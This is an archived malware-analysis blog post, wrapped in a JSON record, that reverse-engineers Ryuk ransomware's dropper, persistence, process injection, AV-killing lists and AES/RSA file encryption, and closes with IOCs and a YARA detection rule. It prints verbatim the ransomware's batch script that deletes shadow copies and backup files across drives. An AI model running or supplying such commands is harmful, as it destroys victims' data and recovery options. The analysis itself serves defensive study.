{
	"id": "cc5ada14-f1e1-4b3c-8092-41f40312b2ad",
	"created_at": "2026-04-06T00:14:35.939049Z",
	"updated_at": "2026-04-10T03:21:22.560487Z",
	"deleted_at": null,
	"sha1_hash": "af53f197f93d93713969288b930e6c82864f911a",
	"title": "Deep Analysis of Ryuk Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 638097,
	"plain_text": "Deep Analysis of Ryuk Ransomware\r\nBy Abdallah Elshinbary\r\nPublished: 2020-05-05 · Archived: 2026-04-06 00:02:54 UTC\r\nIntroduction\r\nAttack Chain\r\nRyuk has been known to be part of a bigger \"Triple Threat\" attack that involves Emotet and TrickBot.\r\nThe first stage of this attack is the delivery of Emotet through phishing emails that contain a weaponized Word\r\ndocument; this document contains macro code that downloads Emotet.\r\nOnce Emotet executes, it downloads another malware (usually TrickBot) which can collect system information,\r\nsteal credentials, disable AV, perform lateral movement, …\r\nThe third stage of the attack is to connect to the C\u0026C server to download Ryuk, which makes use of the lateral\r\nmovement done by TrickBot to infect and encrypt as many systems on the network as possible.\r\nRyuk overview\r\nI will give a brief overview of how Ryuk operates, then I will go into details in the upcoming sections.\r\nRyuk operates in two stages. The first stage is a dropper that drops the real Ryuk ransomware in another directory\r\nand exits. Then the ransomware tries to inject into running processes to avoid detection. 
We can also see that it\r\nlaunches a cmd.exe process to modify the registry.\r\nhttps://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/\r\nPage 1 of 13\n\nAfter that, Ryuk goes through encrypting the system files and network shares; it drops a \"Ransom Note\" in every\r\nfolder it encrypts under the name RyukReadMe.txt.\r\nEnough introduction, let’s dive into Ryuk.\r\nFirst Stage (The Dropper)\r\nSHA256: 23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2\r\nThe dropper first checks the Windows MajorVersion and if it’s equal to 5 (Windows 2000 | Windows XP |\r\nWindows Server 2003), it drops the ransomware executable at C:\\Documents and Settings\\Default User\\,\r\notherwise it drops it at C:\\users\\Public\\.\r\nThe name of the dropped executable is five randomly generated characters.\r\nIf the creation of this file fails, Ryuk drops the executable in the same directory as the dropper, replacing the\r\nlast character of its name with the letter ‘V’ (if the dropper name is ryuk.exe, the dropped executable will be\r\nryuV.exe).\r\nNext we can see a call to IsWow64Process() and if it returns true (which means Ryuk is running on a 64-bit\r\nsystem), it writes the 64-bit binary to the dropped executable, else it writes the 32-bit binary. 
The two binary files are\r\nstored in the .data section.\r\nThe last step is a call to ShellExecuteW() to execute the second stage executable, passing it one argument\r\nwhich is the dropper path (this is used later to delete the dropper).\r\nSecond Stage\r\nSHA256: 8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7d\r\nDeleting The Dropper\r\nBefore the dropper exits, it passes its path to the second stage executable as a command line argument, which in\r\nturn deletes the dropper.\r\nPersistence\r\nRyuk uses the very well known Run registry key to achieve persistence. It creates a new value under the name\r\n\"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\" and its data is set to the\r\nexecutable path, which in my case is \"C:\\users\\Public\\BPWPc.exe\".\r\nHere is the full command:\r\nC:\\Windows\\System32\\cmd.exe /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"sv\r\nPrivilege Escalation\r\nRyuk uses the AdjustTokenPrivileges() function to adjust its process security access token. The requested privilege\r\nname is SeDebugPrivilege and according to Microsoft docs:\r\nSeDebugPrivilege:\r\nRequired to debug and adjust the memory of a process owned by another account. 
With this privilege,\r\nthe user can attach a debugger to any process or to the kernel.\r\nThis privilege is usually requested by malware in order to perform process injection (which is done next).\r\nProcess Injection\r\nRyuk goes through all running processes and stores (ProcessName, ProcessID, ProcessType) in a big array.\r\nProcessType is an integer that is set to 1 if the domain name of the user of the process starts with “NT A”\r\n(which is “NT AUTHORITY”), otherwise the ProcessType is set to 2.\r\nTo make it easier, I created a structure in IDA called ProcessInfo.\r\nAfter that, Ryuk loops through the processes’ stored data to perform the process injection.\r\nIf the process name is (csrss.exe | explorer.exe | lsaas.exe), Ryuk ignores that process.\r\nThe process injection technique used here is very simple: Ryuk allocates memory for its own image in the target\r\nprocess memory space using VirtualAllocEx(), then it writes its image to that allocated memory using\r\nWriteProcessMemory(). Finally it creates a new thread using CreateRemoteThread() to run Ryuk’s thread in the\r\ninjected process.\r\nBuilding Imports\r\nRyuk imports its necessary functions dynamically using LoadLibraryA() and GetProcAddress(). 
The names of\r\nthe imported functions are obfuscated, so static analysis won’t do very well here.\r\nWe can use a debugger to get these names rather than reversing the obfuscation algorithm.\r\nHere is the list of imported functions:\r\n  advapi32.dll\r\n      CryptAcquireContextW\r\n      CryptDecrypt\r\n      CryptDeriveKey\r\n      CryptDestroyKey\r\n      CryptEncrypt\r\n      CryptExportKey\r\n      CryptGenKey\r\n      CryptImportKey\r\nKilling Processes\r\nRyuk has a long list of predefined services and processes to kill using net stop and taskkill /IM\r\nrespectively.\r\nHere is the list of services:\r\n    Acronis VSS Provider\r\n    Enterprise Client Service\r\n    Sophos Agent\r\n    Sophos AutoUpdate Service\r\n    Sophos Clean Service\r\n    Sophos Device Control Service\r\n    Sophos File Scanner Service\r\n    Sophos Health Service\r\n    Sophos MCS Agent\r\n    Sophos MCS Client\r\nAnd here is the list of processes:\r\n    zoolz.exe\r\n    agntsvc.exe\r\n    dbeng50.exe\r\n    dbsnmp.exe\r\n    encsvc.exe\r\n    excel.exe\r\n    firefoxconfig.exe\r\n    infopath.exe\r\nDeleting Backups\r\nRyuk drops a batch script at C:\\Users\\Public\\window.bat which deletes all shadow copies and possible\r\nbackups, then the script deletes itself.\r\nvssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: 
/maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\r\ndel /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\r\ndel /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d:\\*.dsk\r\ndel /s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e:\\*.dsk\r\ndel /s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f:\\*.dsk\r\ndel /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g:\\*.dsk\r\ndel /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h:\\*.dsk\r\ndel %0\r\nThe Encryption Process\r\nRyuk uses a multi-threading approach for the encryption process: it creates a new thread for each file it encrypts,\r\nwhich makes it very fast.\r\nIt starts enumerating files using FindFirstFileW() and FindNextFileW(), then it passes each file name to a new\r\nencryption thread. 
Note that Ryuk avoids encrypting these file extensions:\r\n.dll\r\n.lnk\r\n.hrmlog\r\n.ini\r\n.exe\r\nEach encryption thread starts by generating a random 256-bit AES encryption key using CryptGenKey(); Ryuk\r\nutilizes the Windows Crypto API for the encryption.\r\nThen it goes into the typical encryption loop; the files are encrypted in chunks with a chunk size of 1000000\r\nbytes.\r\nFinally Ryuk writes a metadata block of size 274 bytes at the end of the file. The first 6 bytes are the keyword\r\nHERMES.\r\nAfter that, the AES key is encrypted with an RSA public key before it’s written to the end of the file, then\r\nexported using CryptExportKey(). This function generates 12 bytes of blob information + 256 bytes (the\r\nencrypted key).\r\nThe RSA public key is embedded in the executable; it’s imported using CryptImportKey() and passed to every\r\nencryption thread.\r\nWe can see at the end of the encryption routine a check whether the keyword HERMES is present at the end of the file\r\n(which indicates the file is already encrypted).\r\nThis check is actually done before encrypting the file to avoid encrypting it twice.\r\nHere is an example of the complete metadata block:\r\nRyuk enumerates network shares using WNetOpenEnumW() and WNetEnumResourceA().\r\nFor each network resource found, the resource’s name will be appended to a list separated by a semicolon. 
This\r\nlist will be used later to encrypt these network shares with the same encryption process described above.\r\nIOCs\r\nHashes\r\nRyuk: 8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7\r\nDropper: 23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2\r\nFiles\r\nC:\\Users\\Public\\window.bat\r\nRegistry\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nEmails\r\nWayneEvenson@protonmail[.]com\r\nWayneEvenson@tutanota[.]com\r\nYara Rule\r\nrule Ryuk\r\n{\r\n    meta:\r\n        author = \"N1ght-W0lf\"\r\n        description = \"Detect Ryuk Samples\"\r\n        date = \"2020-05-08\"\r\n    strings:\r\n        $s1 = \"RyukReadMe.txt\" ascii wide\r\n        $s2 = \"No system is safe\" ascii wide\r\n        $s3 = \"svchos\" ascii wide fullword\r\n        $s4 = \"vssadmin Delete Shadows /all /quiet\" ascii wide\r\n        $s5 = \"UNIQUE_ID_DO_NOT_REMOVE\" ascii wide\r\n        $s7 = \"\\\\users\\\\Public\\\\window.bat\" ascii wide\r\n        $s6 = \"HERMES\" ascii wide\r\n    condition:\r\n        5 of them\r\n}\r\nExternal References\r\nhttps://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/\r\nhttps://research.checkpoint.com/2018/ryuk-ransomware-targeted-campaign-break/\r\nhttps://app.any.run/tasks/81eaa3cf-eb75-411f-adba-b09472927155/\r\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672\r\nhttps://www.codeproject.com/Articles/1658/Obtain-the-plain-text-session-key-using-CryptoAPI\r\nSource: https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/"
	],
	"report_names": [
		"ryuk-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434475,
	"ts_updated_at": 1775791282,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/af53f197f93d93713969288b930e6c82864f911a.pdf",
		"text": "https://archive.orkl.eu/af53f197f93d93713969288b930e6c82864f911a.txt",
		"img": "https://archive.orkl.eu/af53f197f93d93713969288b930e6c82864f911a.jpg"
	}
}